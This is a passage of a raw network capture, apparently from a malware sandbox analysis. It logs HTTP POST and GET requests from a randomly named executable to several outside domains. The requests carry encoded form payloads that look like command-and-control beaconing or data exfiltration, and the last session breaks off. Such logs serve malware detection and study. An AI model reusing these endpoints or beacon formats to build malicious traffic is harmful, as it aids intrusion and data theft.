                                  3192.168.2.749714193.201.190.93806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:29.132972956 CEST1766OUTPOST /1df8/ HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.gett.hu
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.gett.hu/1df8/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 34 57 77 51 34 51 55 6d 43 67 57 4c 4c 7a 44 37 73 69 41 37 42 6a 6b 5a 4e 74 71 50 73 33 63 50 38 4b 4d 54 4e 58 35 6e 4c 57 67 34 39 4f 66 6f 74 63 61 42 33 74 4a 78 48 69 54 77 58 77 49 54 4f 41 6c 41 73 6a 35 34 55 63 33 47 6f 71 62 63 65 4a 2b 32 52 64 67 30 75 52 31 47 77 6d 51 79 72 41 55 48 50 74 72 2b 50 42 32 38 64 50 32 58 31 66 43 74 73 4c 33 73 36 45 64 6f 4b 78 65 74 48 43 57 2f 66 41 61 6e 73 4b 43 70 35 56 52 6a 33 48 4a 74 53 2b 34 55 4e 69 73 2b 34 37 4f 5a 52 34 44 4d 6c 34 49 73 63 6e 73 44 6d 6a 55 6e 58 54 46 35 67 68 5a 2f 52 36 39 73 61 45 76 79 55 30 30 38 34 32 64 56 59 42 74 65 74 6a 46 2f 30 57 6b 58 79 50 48 32 56 46 64 71 73 47 6d 2b 77 57 4f 32 38 56 4d 4d 76 38 62 39 59 78 49 48 6a 57 4e 45 74 4f 49 55 4a 76 75 32 58 76 4c 55 32 32 68 41 43 62 5a 64 41 77 67 47 72 4b 72 6f 61 58 71 57 7a 7a 34 6f 75 64 72 47 75 74 33 74 78 4c 56 61 48 55 4f 37 55 2b 74 52 77 54 4e 62 52 67 6d 70 33 2b 52 33 4b 7a 43 37 6b 70 61 41 4b 73 [TRUNCATED]
                                  Data Ascii: 4h=KIb1Xcz2b0aqt4WwQ4QUmCgWLLzD7siA7BjkZNtqPs3cP8KMTNX5nLWg49OfotcaB3tJxHiTwXwITOAlAsj54Uc3GoqbceJ+2Rdg0uR1GwmQyrAUHPtr+PB28dP2X1fCtsL3s6EdoKxetHCW/fAansKCp5VRj3HJtS+4UNis+47OZR4DMl4IscnsDmjUnXTF5ghZ/R69saEvyU00842dVYBtetjF/0WkXyPH2VFdqsGm+wWO28VMMv8b9YxIHjWNEtOIUJvu2XvLU22hACbZdAwgGrKroaXqWzz4oudrGut3txLVaHUO7U+tRwTNbRgmp3+R3KzC7kpaAKsaItwblAB+caDqTleMxS8oZCVrllLsIo2s45KeyTYFuny6lNLQERkYcksyAiHpEJGjV+LiW0JW03JdVKutgA4YqnD33rPATUavKsdI/8fe6jc4/JdUn1uk31p/QqkIOSoTSKrrpaOtSTLVPO1et7ld7N11vIR4QvyTNNcX4MIpJ57QrXxt2VkL2w5X3kTqM9T9kpwp2sfC5KZFBWXpBHaMrpU+U15zLYU7vYCPpmoUPtiE6XwXz3sAbzgGmwGSZz1mjOwqYb2QuP9aE2t9aobxv3Pz1JW9v0/+r08tM3Dyhk1ReTVFxnXufrcEJTJ8PJfcMlqTdocDLPhYUmLlZLcUdxiRlf1A0t0eBJea66PWl3mC9X4bvJC7fOml5bj6ujbTSZchyfeZZxsx3R6SgyiWZso3xu/3gPoKuHvAkv8ds9lp0HZPhdL+EYgubHOp6JjhhtmSrCJpTA8Wmkt800ykz1rQvu1qNNY282PnFsPu9WytlewG6zwmPq+CT8bEpao569Ztd//olKsvWsWu8Ecz4SaIF0VyOxt5sHJThpFOXyYES2zahnJNUaXk+y5s0wN28hm4cIfapShk0kX3TCAwy4lK6lMei3SC3biunWdcOeCuVNPMPnAt2sJmHANkteMBC/rs3GngJB0fAmbcuvz92dw7XzEl5NREC [TRUNCATED]
                                  May 27, 2024 12:34:29.820441008 CEST479INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:29 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.749715193.201.190.93806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:31.663728952 CEST482OUTGET /1df8/?4h=HKzVUqf1aEuVi+2sXpcO0QRiAr3gocmC4R78U/lSG5GPWeqrEM/dj7KCi/m7j8wlbFRbxXaftyt8S80LR8LDtnhaMK2/eM8I7y9bqMxgYhPG1v0QEsNv7Olz+oqDA3TDqZmGkZkE9/dY&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.gett.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:32.305011034 CEST479INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:32 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.749716104.21.81.245806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:37.421438932 CEST745OUTPOST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 66 5a 38 4a 79 4f 38 37 32 51 76 57 51 2b 45 33 50 6a 36 6a 32 5a 6e 6a 59 76 4d 38 41 6e 4a 37 4b 39 54 63 4b 6b 62 57 37 6a 6f 44 58 69 4b 6e 4d 43 4c 34 6d 36 71 36 44 4d 35 68 67 61 57 36 59 38 43 62 6a 2f 45 51 79 4f 68 2f 50 42 65 35 57 44 6a 57 2f 44 2f 43 49 56 4a 4e 43 55 49 47 39 56 71 57 57 50 46 65 68 46 4c 47 6f 54 45 70 76 4f 71 54 59 59 39 66 4f 34 68 35 78 58 34 6d 45 4d 6e 31 66 6c 4a 49 4d 54 61 78 52 72 43 2f 38 58 62 2f 74 74 43 44 72 75 36 78 66 52 76 35 62 76 46 65 63 49 6c 44 55 47 33 35 73 6f 62 6d 45 53 64 62 6e 56 48 78 69 73 42 63 4a 67 37 39 52 50 6b 59 63 4d 6d 59 6c 39 79 4d 73 30 70 4f 51 3d 3d
                                  Data Ascii: 4h=bfZ8JyO872QvWQ+E3Pj6j2ZnjYvM8AnJ7K9TcKkbW7joDXiKnMCL4m6q6DM5hgaW6Y8Cbj/EQyOh/PBe5WDjW/D/CIVJNCUIG9VqWWPFehFLGoTEpvOqTYY9fO4h5xX4mEMn1flJIMTaxRrC/8Xb/ttCDru6xfRv5bvFecIlDUG35sobmESdbnVHxisBcJg79RPkYcMmYl9yMs0pOQ==
                                  May 27, 2024 12:34:38.124923944 CEST805INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:38 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFfBmjngeefoQXmwhIwusgCfJraR3M1FEcCdHCY%2Bs1IxfHaFkXcmyw6o3YuwCh0hr6B2e1mOClgnTbI90mkg5mRJatLAIlE3hnIMP%2BDXHRbMeT3u%2Bv6QJJMiTZgQRMSXvkw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55a827f2ac33d-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: a8L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qFb|<0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.749717104.21.81.245806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:39.961582899 CEST765OUTPOST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 66 5a 38 4a 79 4f 38 37 32 51 76 57 77 75 45 6b 38 4c 36 72 32 5a 67 73 34 76 4d 7a 67 6d 4f 37 4b 68 54 63 50 55 31 57 4a 48 6f 44 7a 75 4b 6d 49 75 4c 37 6d 36 71 31 6a 4d 77 69 51 62 59 36 59 77 4b 62 6d 48 45 51 79 4b 68 2f 4f 78 65 34 6c 62 67 58 76 44 39 45 49 56 4c 4a 43 55 49 47 39 56 71 57 56 7a 76 65 67 68 4c 48 59 44 45 37 4f 4f 6c 65 34 59 69 59 4f 34 68 7a 52 58 38 6d 45 4e 49 31 64 42 7a 49 4a 58 61 78 54 7a 43 2b 74 58 59 78 74 74 2b 64 62 76 69 68 50 63 51 38 65 48 72 5a 38 59 37 4a 33 4b 55 38 61 31 35 38 6d 65 78 46 32 74 38 31 67 49 33 4c 76 39 4f 2f 51 4c 38 56 2b 34 48 48 53 59 59 42 2b 56 74 59 69 32 38 75 6e 33 46 4a 69 2f 4b 38 52 6a 37 42 7a 79 63 67 58 6f 3d
                                  Data Ascii: 4h=bfZ8JyO872QvWwuEk8L6r2Zgs4vMzgmO7KhTcPU1WJHoDzuKmIuL7m6q1jMwiQbY6YwKbmHEQyKh/Oxe4lbgXvD9EIVLJCUIG9VqWVzveghLHYDE7OOle4YiYO4hzRX8mENI1dBzIJXaxTzC+tXYxtt+dbvihPcQ8eHrZ8Y7J3KU8a158mexF2t81gI3Lv9O/QL8V+4HHSYYB+VtYi28un3FJi/K8Rj7BzycgXo=
                                  May 27, 2024 12:34:40.656408072 CEST804INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:40 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w40qH%2BXGSRJfiJagOpcaw3Usw%2BBQTZ%2FMBbIIc3J11902iE8ey2YXzrrs4HDU5Fro%2BFq5yxiVNJqPsApT8o2kC9%2BqqxBI5E8XSdypPzK8Bt3a7DA2SNKkl9yghmXx4qpK15I%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55a9249ca4234-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.749718104.21.81.245806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:42.560177088 CEST1778OUTPOST /jcz4/ HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.lets-goo.ru
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.lets-goo.ru/jcz4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 62 66 5a 38 4a 79 4f 38 37 32 51 76 57 77 75 45 6b 38 4c 36 72 32 5a 67 73 34 76 4d 7a 67 6d 4f 37 4b 68 54 63 50 55 31 57 4a 50 6f 44 41 6d 4b 6e 76 36 4c 36 6d 36 71 72 54 4d 39 69 51 62 56 36 59 34 4f 62 6d 43 2f 51 77 43 68 74 59 6c 65 74 6b 62 67 65 76 44 39 49 6f 56 49 4e 43 55 64 47 39 6c 75 57 57 62 76 65 67 68 4c 48 61 4c 45 2b 76 4f 6c 59 34 59 39 66 4f 34 31 35 78 57 6a 6d 45 6c 79 31 64 46 5a 49 36 66 61 78 7a 6a 43 7a 2f 2f 59 75 64 74 47 63 62 76 78 68 50 51 78 38 59 6a 6e 5a 39 63 46 4a 31 61 55 38 75 55 32 71 6c 43 61 57 46 46 2f 31 52 59 31 4a 4f 70 6c 6c 6a 2b 45 62 38 30 62 50 6c 63 39 5a 4e 68 36 59 33 44 43 34 56 54 4a 50 67 62 64 38 6b 44 72 61 6a 32 30 39 67 4a 32 47 42 66 49 31 71 52 4c 4e 6f 30 33 45 47 62 63 44 78 49 4f 37 46 71 64 52 72 6b 7a 36 46 59 4a 4e 6a 4e 49 70 72 71 7a 4a 50 61 68 57 4b 73 45 71 39 64 6b 39 48 79 71 53 50 61 54 38 58 41 6c 44 42 33 6e 6b 46 4c 6d 47 6c 41 6b 75 61 53 4e 62 55 4b 4f 58 47 32 65 7a 44 70 6b 71 4e 45 49 37 32 70 68 62 42 79 [TRUNCATED]
                                  Data Ascii: 4h=bfZ8JyO872QvWwuEk8L6r2Zgs4vMzgmO7KhTcPU1WJPoDAmKnv6L6m6qrTM9iQbV6Y4ObmC/QwChtYletkbgevD9IoVINCUdG9luWWbveghLHaLE+vOlY4Y9fO415xWjmEly1dFZI6faxzjCz//YudtGcbvxhPQx8YjnZ9cFJ1aU8uU2qlCaWFF/1RY1JOpllj+Eb80bPlc9ZNh6Y3DC4VTJPgbd8kDraj209gJ2GBfI1qRLNo03EGbcDxIO7FqdRrkz6FYJNjNIprqzJPahWKsEq9dk9HyqSPaT8XAlDB3nkFLmGlAkuaSNbUKOXG2ezDpkqNEI72phbBy3TQx+XHcfxoV/z1cx0JV36sIi2SZOnFxVwWQuEc0Dl0sc+pBTT+o12EkEx6RwS9jvMtSxlouDylIamL0gfEp8bKl/ia5vd7CPL8zZ/55A6idOi88BgnULPV8B3XRfTsJhF73uCrkxgfZRi53qmyS6i+2JxdTeY8urZAKekpdenuNKrncAXxdC0d+vIVrDwH+R+1HdGnmpf12Ix0zmKkRNgOubhOgUXALqw1jZn+NMDkJ7C6kBsZul456VCtNiRcqiEmyJTWFs7dAk2wkT6m37/Oz7evU4AoNwLT27NhbpcQEDu+gT/zU3uKAJkEzu6w2mVumL05MfmMZDHH78YYAUM0G6kU7WQng6ypVZCXLFOiwUIC7Jz2Yw82OOJnQ+c6r2DaEC71uFUUKdlG9sW3NzBvL02s0wKj9KgQ5FsBkxhB7xs76zNBZi5GE3LANfKfFU7WPnEqzUmQCrljinhw/wRDVFNAapDeRjXMRk5nN9Fu85OebHv3N/wLprYRrLX2/JmAo9ZizP/OZQ35+DTCQJ8pLyYLjzQT4ehdBaewhCOEX42uCiZPBoPNBBFho3Ah05xTmG1WP55rDHfI1jWsVkMK1hw4SNe6C15oMXglQHbYxAqvYYsp4aOmwPTOhUG8LIFkM7XCJsg2efyX0pwix78dRq9grXqrfMj [TRUNCATED]
                                  May 27, 2024 12:34:43.261194944 CEST804INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:43 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O84MJQ%2BCfOwHgoOw6VvBemqh7w0bDrwdaNPU%2BGnnQ1Ry2g55xtgUeLo4xfsOCR8xioY%2FDPewGnr7of2s46kOKXA%2FoQUR2O0GrSCvYMhyH4%2BkrfKBqpbL9GvCpW5kTl7oXSw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55aa29a62437b-EWR
                                  Content-Encoding: gzip
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.749719104.21.81.245806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:45.100387096 CEST486OUTGET /jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.lets-goo.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:34:45.801269054 CEST799INHTTP/1.1 404 Not Found
                                  Date: Mon, 27 May 2024 10:34:45 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxdo5ZR4k7ZWkEDIh8ot9bqD6ouRWQ%2B7n%2BUZ%2FTfGKZrTQ9gp8hqkopfUzCIqKZr8RM0SsawC8DEKtzBJw8e%2FAyQq1tJQcoe%2FUTr4lLxp0ktkAZ1l9T41aV03QKbW%2BcPqg0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 88a55ab26a100f4b-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.74972069.57.162.24806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:50.836232901 CEST775OUTPOST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
